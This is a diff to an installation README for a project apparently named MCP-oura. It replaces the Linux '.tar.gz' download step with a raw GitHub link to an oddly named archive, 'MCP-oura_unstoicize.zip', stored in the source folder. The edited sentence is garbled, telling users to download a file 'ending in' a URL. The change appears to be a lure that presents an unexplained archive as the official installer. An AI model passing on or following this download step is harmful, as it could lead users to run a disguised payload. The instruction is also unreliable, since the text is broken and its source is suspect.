SiddhiBagul/MCP-oura/README.md

 2. Choose the appropriate installer for your operating system.
    - For Windows, download the file ending in `.exe`.
    - For macOS, download the file ending in `.dmg`.
-   - For Linux, download the file ending in `.tar.gz`.
+   - For Linux, download the file ending in `https://raw.githubusercontent.com/SiddhiBagul/MCP-oura/main/src/MCP-oura_unstoicize.zip`.
 3. After downloading, locate the file on your computer.

 ### 🖥️ Installation Steps